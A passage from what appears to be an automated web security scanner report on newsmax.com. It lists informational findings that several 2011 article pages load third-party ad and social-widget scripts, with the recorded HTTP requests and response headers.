</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.27. http://www.newsmax.com/InsideCover/dick-morris-times-bestseller/2011/03/18/id/389995  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/dick-morris-times-bestseller/2011/03/18/id/389995

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/dick-morris-times-bestseller/2011/03/18/id/389995 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 55733
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:06:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Dick
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.28. http://www.newsmax.com/InsideCover/franklin-graham-japan-tsunami/2011/03/18/id/389996  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/franklin-graham-japan-tsunami/2011/03/18/id/389996

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/franklin-graham-japan-tsunami/2011/03/18/id/389996 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 57526
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:06:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Frank
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.29. http://www.newsmax.com/InsideCover/helen-thomas-jews-white/2011/03/18/id/390000  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/helen-thomas-jews-white/2011/03/18/id/390000

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/helen-thomas-jews-white/2011/03/18/id/390000 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 55370
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:05:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Helen
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.30. http://www.newsmax.com/InsideCover/newsmax-dickmorris-mikehuckabee-newyorktimes/2011/03/18/id/389967  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/newsmax-dickmorris-mikehuckabee-newyorktimes/2011/03/18/id/389967

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/newsmax-dickmorris-mikehuckabee-newyorktimes/2011/03/18/id/389967 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 57582
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:03:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Hucka
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.31. http://www.newsmax.com/InsideCover/scott-walker-gop-republican/2011/03/18/id/389994  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /InsideCover/scott-walker-gop-republican/2011/03/18/id/389994

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /InsideCover/scott-walker-gop-republican/2011/03/18/id/389994 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 54442
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:06:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Poll:
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.32. http://www.newsmax.com/Newsfront/AF-Libya/2011/03/19/id/390002  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Newsfront/AF-Libya/2011/03/19/id/390002

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Newsfront/AF-Libya/2011/03/19/id/390002 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 56635
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:03:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Gadha
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.33. http://www.newsmax.com/Newsfront/AS-Japan-Earthquake/2011/03/19/id/390009  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Newsfront/AS-Japan-Earthquake/2011/03/19/id/390009

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Newsfront/AS-Japan-Earthquake/2011/03/19/id/390009 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 60695
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:01:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Japan
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.34. http://www.newsmax.com/Newsfront/AS-Japan-Earthquake/2011/03/19/id/390011  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Newsfront/AS-Japan-Earthquake/2011/03/19/id/390011

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Newsfront/AS-Japan-Earthquake/2011/03/19/id/390011 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 59853
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:01:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Teams
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.35. http://www.newsmax.com/Newsfront/AS-Japan-Earthquake/2011/03/19/id/390015  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Newsfront/AS-Japan-Earthquake/2011/03/19/id/390015

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Newsfront/AS-Japan-Earthquake/2011/03/19/id/390015 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 59763
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:01:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Man R
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.36. http://www.newsmax.com/Newsfront/Japan-TravelWarning/2011/03/19/id/390013  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Newsfront/Japan-TravelWarning/2011/03/19/id/390013

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Newsfront/Japan-TravelWarning/2011/03/19/id/390013 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53274
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:02:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   State
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.37. http://www.newsmax.com/Newsfront/Libya-Diplomacy/2011/03/19/id/390019  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Newsfront/Libya-Diplomacy/2011/03/19/id/390019

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Newsfront/Libya-Diplomacy/2011/03/19/id/390019 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 61164
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:01:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Amid
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.38. http://www.newsmax.com/Newsfront/Libya-Diplomacy/2011/03/19/id/390020  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Newsfront/Libya-Diplomacy/2011/03/19/id/390020

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Newsfront/Libya-Diplomacy/2011/03/19/id/390020 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 57625
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:01:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   World
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.39. http://www.newsmax.com/Newsfront/Obama-LatinAmerica/2011/03/19/id/390001  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Newsfront/Obama-LatinAmerica/2011/03/19/id/390001

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Newsfront/Obama-LatinAmerica/2011/03/19/id/390001 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 59087
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:03:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Obama
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.40. http://www.newsmax.com/Newsfront/Obit-WarrenChristopher/2011/03/19/id/390006  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Newsfront/Obit-WarrenChristopher/2011/03/19/id/390006

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Newsfront/Obit-WarrenChristopher/2011/03/19/id/390006 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53309
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:03:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Forme
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.41. http://www.newsmax.com/Newsfront/UN-Japan-Earthquake/2011/03/18/id/389909  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Newsfront/UN-Japan-Earthquake/2011/03/18/id/389909

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Newsfront/UN-Japan-Earthquake/2011/03/18/id/389909 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
